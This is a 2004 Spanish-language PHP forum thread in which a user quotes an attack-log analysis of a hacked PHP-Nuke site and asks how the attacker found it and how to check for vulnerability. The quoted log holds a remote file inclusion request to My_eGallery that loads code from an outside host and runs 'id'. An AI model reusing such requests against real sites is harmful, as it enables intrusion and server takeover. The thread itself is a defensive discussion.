Foros del Web » Programando para Internet » PHP »

duda con pag. que fue hackeada

Estas en el tema de duda con pag. que fue hackeada en el foro de PHP en Foros del Web. hola maestros navegando por la internet encontre esto : http://www.todo-linux.com/modules.ph...ticle&sid=1740 bueno explica como fue hackedo un sitio pero tengo dos dudas hacerca de eso : ...
  #1 (permalink)  
Antiguo 14/05/2004, 13:07
Avatar de mveraa  
Fecha de Ingreso: diciembre-2002
Ubicación: santiago-chilito
Mensajes: 1.895
Antigüedad: 15 años
Puntos: 2
Pregunta duda con pag. que fue hackeada

hola maestros navegando por la internet encontre esto :

http://www.todo-linux.com/modules.ph...ticle&sid=1740


bueno explica como fue hackedo un sitio pero tengo dos dudas hacerca de eso :

Análisis del log de ataque


200.210.233.250 - - [02/Apr/2004:08:56:03 +0200] "GET /modules.php?name=My_eGallery HTTP/1.0" 200 5402 "http://www.google.com.br/sea rch?q=gente+/modules.php%3Fname%3DMy_eGallery+&hl=pt-BR&lr=&ie=UTF-8&oe=UTF-8&start=40&sa=N" "Mozilla/4.0 (compatible; MSIE 6.0; Win dows 98)"

Una vez más vemos que nuestro amigo atacante procedia del gran google, inició una busqueda masiva en busca de web que tuviesen nuestro modulo de fotos. En la 7º posicion del rankink estabamos nosotros y fuimos las victimas.


¿a que se refiere con lo de "nuestro modulo de fotos" y como las busca el google?



200.210.233.250 - - [02/Apr/2004:08:56:44 +0200] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://www.skater0x.h pg.com.br/cse.gif?&cmd=id HTTP/1.0" 200 795 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"

Una cuantas lineas despues, y despues de navegar por nuestro site , nuestro atacante particular, lanza un comando via URI para ver si nuestra version es vulnerable, al darse cuanta que SI lo es, inicia el ataque....


¿como puedo saber si mi version es vulnerable , dado que ocupo apache tanto en windows y en red hat 9.0?



bueno saludos y gracias...
  #2 (permalink)  
Antiguo 14/05/2004, 15:12
Avatar de mautik  
Fecha de Ingreso: mayo-2004
Mensajes: 149
Antigüedad: 13 años, 7 meses
Puntos: 0
ese es el problema de usar nuke, todos lo conocen y todos manejan el codigo.

Ni te estreses mucho porque no será la primera ni la ultima vez que te golpeen
__________________
123...probando...probando...123
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta




La zona horaria es GMT -6. Ahora son las 05:50.